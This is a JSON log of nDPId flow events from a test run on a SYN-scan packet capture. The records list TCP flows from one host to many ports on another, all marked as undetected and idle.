+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 